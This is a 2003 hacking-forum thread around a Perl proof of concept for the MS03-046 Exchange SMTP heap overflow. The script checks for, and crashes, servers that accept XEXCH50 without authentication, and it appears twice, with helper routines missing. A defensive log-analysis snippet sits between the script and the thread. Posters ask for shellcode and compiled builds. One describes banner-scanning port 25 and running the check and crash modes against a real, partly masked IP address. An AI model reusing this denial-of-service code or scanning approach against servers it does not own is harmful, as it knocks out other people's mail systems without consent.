```perl
#!/usr/bin/perl -w
##################
##
# ms03-046.pl - hdm metasploit com
#
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.
#
# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }
usage();

sub check {
    my $s = SMTP($host, $port);
    if (! $s) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i) {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";
    exit(0);
}

sub crash {
    my $s = SMTP($host, $port);
    if (! $s) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i) {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print $s "RCPT TO: Administrator\r\n";
    my $r = <$s>;
    return undef if !$r;
    return($s);
}
```
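A defender-side companion to the CHECK logic above, added here and not part of hdm's PoC or this thread: it walks a constructed SMTP session log (the `<session> <C|S> <text>` line format is an assumption, not Exchange's real protocol log format) and flags XEXCH50 commands the server accepted with a 354 reply before any successful AUTH, plus XEXCH50 size arguments that are not positive, which is the trigger the PoC's CRASH mode sends.

```python
import re

# Constructed sample session log; line format "<session> <C|S> <text>" is an assumption.
SAMPLE_LOG = """\
s1 S 220 mail.example.test ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready.
s1 C XEXCH50 -1 2
s1 S 354 Send binary data
s2 C AUTH NTLM
s2 S 334 challenge
s2 C dG9rZW4=
s2 S 235 Authentication succeeded
s2 C XEXCH50 2048 2
s2 S 354 Send binary data
s3 C XEXCH50 2 2
s3 S 504 Need to authenticate first
"""

LINE_RE = re.compile(r"^(?P<sess>\S+) (?P<dir>[CS]) (?P<text>.*)$")
XEXCH50_RE = re.compile(r"^XEXCH50\s+(?P<size>-?\d+)\s+(?P<flags>\d+)", re.I)

def analyze(log_text):
    # Returns a list of (session, reason) findings.
    authed = set()   # sessions that completed AUTH with a 235 reply
    pending = {}     # session -> "auth" or "xexch50", awaiting the server's reply
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m: continue
        sess, direction, text = m.group("sess"), m.group("dir"), m.group("text")
        if direction == "C":
            if text.upper().startswith("AUTH "):
                pending[sess] = "auth"
            x = XEXCH50_RE.match(text)
            if x:
                size = int(x.group("size"))
                if size <= 0:
                    findings.append((sess, f"XEXCH50 with non-positive size {size}"))
                pending[sess] = "xexch50"
            continue
        code = text[:3]
        state = pending.get(sess)
        if state == "auth":
            if code == "235":
                authed.add(sess)
            if code != "334":          # 334 means the SASL exchange continues
                pending.pop(sess, None)
        elif state == "xexch50":
            pending.pop(sess, None)
            if code == "354" and sess not in authed:
                findings.append((sess, "XEXCH50 accepted (354) before authentication"))
    return findings
```

Only session s1 is reported: the patched behaviour the PoC comments describe (XEXCH50 refused until after NTLM authentication) produces no finding for s2 or s3.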
Kynroxes
Oct 22 2003, 04:52 PM
yeah ya Gurou, kotik rulezz, I will see it ... tks
Gurou
Oct 22 2003, 05:55 PM
Can anyone modify it and add a shell?
thatsmej
Oct 22 2003, 06:40 PM
QUOTE (Gurou @ Oct 22 2003, 05:55 PM)
Can anyone modify it and add a shell?
Why is it that every time a POC is released, ppl reply with this?
just wait :\
-=[MePhIsTo]=-
Oct 22 2003, 06:58 PM
How do I scan for this vulnerability? It seems to be port 25 (MS SMTP Service), but which versions are vulnerable?!?!
-=[MePhIsTo]=-
Oct 22 2003, 07:09 PM
Here is an example of a vulnerable host I found:
I searched for port 25 and the banner string *microsoft*
CODE
```
212.17.*.* 25 220 web.ex****a.it ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready.
```
After that I checked:
CODE
```
C:\Dokumente und Einstellungen\Mephisto\Desktop>as.pl
Usage: C:\Dokumente und Einstellungen\Mephisto\Desktop\as.pl <host> [CHECK|CRASH ]

C:\Dokumente und Einstellungen\Mephisto\Desktop>as.pl 212.17.*.* CHeck
[*] This system is vulnerable: 212.17.*.*:25
```
and after the exploitation:
CODE
```
C:\Dokumente und Einstellungen\Mephisto\Desktop>as.pl 212.17.*.* Crash
[*] This server has been patched or is not vulnerable.
```
This was my first try.
any
Oct 22 2003, 10:58 PM
QUOTE (Gurou @ Oct 22 2003, 05:55 PM)
Can anyone modify it and add a shell?
gimme a moment, i'm calling mr bullshit...
beep beep
any
Oct 22 2003, 11:07 PM
QUOTE
```perl
#!/usr/bin/perl -w
##################
##
# ms03-046.pl - hdm metasploit com
#
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.
#
# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }
usage();

sub check {
    my $s = SMTP($host, $port);
    if (! $s) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i) {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";
    exit(0);
}

sub crash {
    my $s = SMTP($host, $port);
    if (! $s) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i) {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print $s "RCPT TO: Administrator\r\n";
    my $r = <$s>;
    return undef if !$r;
    return($s);
}
```
I implemented a shell into that mfin' poc only for you, wasn't easy I can tell ya
slb33
Oct 23 2003, 04:53 AM
Hehe...Good work!
I'm glad someone finally put a shell into this poc!
lmao
Gurou
Oct 23 2003, 08:48 AM
strasharo
Oct 23 2003, 09:27 AM
Good work hahahha.
Thom
Oct 23 2003, 01:16 PM
Can someone compile it under win?
any
Oct 23 2003, 01:22 PM
QUOTE (th0m @ Oct 23 2003, 01:16 PM)
Can someone compile it under win?
dude, THERE is the door
gogu258
Oct 24 2003, 10:11 PM
NOOBS (not all ppl from this topic): IT'S A DOS - DENIAL OF SERVICE EXPLOIT. IT WORKS WITH PERL, SO DON'T ASK FOR A COMPILED VERSION. Just use Perl for Windows or something like that. Why don't you read the source or use the hint? There is something very clear: "Usage: $0 <host> [CHECK|CRASH ]\n". What shell? There is no shell.
devil666
Oct 30 2003, 10:09 AM
QUOTE
What shell, there is no shell.
Look at the red & yellow sign on top of the poc !!!
LOL
lasantarosa
Oct 30 2003, 12:56 PM
LOL !!!
morbido
Nov 1 2003, 11:40 PM
thankz a lot bro, I'll check it
morbido
Nov 1 2003, 11:48 PM
Big LOL, this shitty thing is for nothing, lol
zadium
Nov 2 2003, 03:32 AM
LOL
Cheeky bastard
VamPs
Nov 4 2003, 08:10 AM
lmao, took me awhile
at least some people have got a sense of humour tho
limbox
Nov 4 2003, 09:11 PM
that's cool, hehe
redjoker
Dec 5 2003, 06:58 PM
I need this file as an EXE for the Windows platform... Please help me... Thanks
hmm, I get a big fat "[*] Error establishing connection to SMTP service." Maybe I'm missing something.
gsicht
Dec 6 2003, 04:07 PM
lol, good job any, I tested it. It worked great!!!
QuadMedic
Dec 10 2003, 06:52 AM
shell rox cool gas...................
GhostCow
Dec 10 2003, 07:11 AM
great job any!! thanks a bunch!! I just hope it will work ROFL!!!!!!!!!!!
For anyone who is looking for a banner scanner: check out the GSO software projects forum or the tool design forum. gan green and coder made nice banner scanners worth using!
QUOTE
I searched for port 25 and the banner string *microsoft*
Thanks for the tip, Mephisto!
yeyo
Dec 10 2003, 04:08 PM
QUOTE (redjoker @ Dec 5 2003, 06:58 PM)
I need this file as an EXE for the Windows platform... Please help me... Thanks
joker,
There is a perl2exe on the board man, use the search button.
Thanks 4 the code, I'll try it.
--Elite--
Feb 26 2004, 01:21 AM
cheers! Finally, this heap overflow lets u sneak in a shell! yeah! another hard to exploit one + another specialist = remote code execution
Chinzo
Feb 26 2004, 09:23 AM
QUOTE (--Elite-- @ Feb 26 2004, 01:21 AM)
cheers! Finally, this heap overflow lets u sneak in a shell! yeah! another hard to exploit one + another specialist = remote code execution
Ok, cool man, will "the another specialist" let us view the code for "remote code execution"?
R3myBoy
Feb 26 2004, 09:41 AM
That's a Perl script .... No real need to compile it under Windows ... Just install ActivePerl on your box ....
BTW nice shell